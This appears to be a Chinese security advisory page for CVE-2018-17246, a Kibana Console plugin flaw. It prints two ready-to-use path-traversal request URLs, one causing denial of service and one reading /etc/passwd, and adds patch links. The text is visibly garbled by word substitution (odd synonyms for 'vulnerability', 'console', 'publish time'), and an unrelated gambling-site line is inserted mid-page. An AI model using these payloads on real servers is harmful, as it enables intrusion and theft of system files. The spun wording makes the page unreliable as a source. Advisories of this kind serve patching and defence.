首页 > 安全钻研 > 安全传递 > 安全公告

颁布功夫 2018-12-20

CVE编号：CVE-2018-17246，危险级别：中危，CVSS分值：厂商自评 6.3，官方未评定

ElasticSearch Kibana <6.4.3

ElasticSearch Kibana <5.6.13

Elasticsearch Kibana（前称elasticsearch-dashboard）是荷兰Elasticsearch公司的一套开源的、基于浏览器的分析和搜索Elasticsearch仪表板工具。Console是其中的一个节造台插件。

Elasticsearch Kibana 6.4.3之前版本和5.6.13之前版本中的Console插件存在安全缝隙。攻击者可通过发送要求利用该缝隙在主机操作系统上以Kibana过程权限执行肆意号令。

GA黄金甲·(中国区)官方网站

POC/EXP：

回绝服务，攻击向量如下：

/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../cli_plugin/index

肆意文件读取，攻击向量如下：

/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd

目前厂商已颁布升级补丁以建复缝隙，补丁获取链接:

https://access.redhat.com/security/cve/cve-2018-17246

https://access.redhat.com/security/cve/cve-2018-17246

http://www.cnvd.org.cn/flaw/show/CNVD-2018-23907

400-624-3900

+86(10)56631988(港澳专线)

官方微信

官方微博

网御星云合多数据书生电子云子可信

司法申明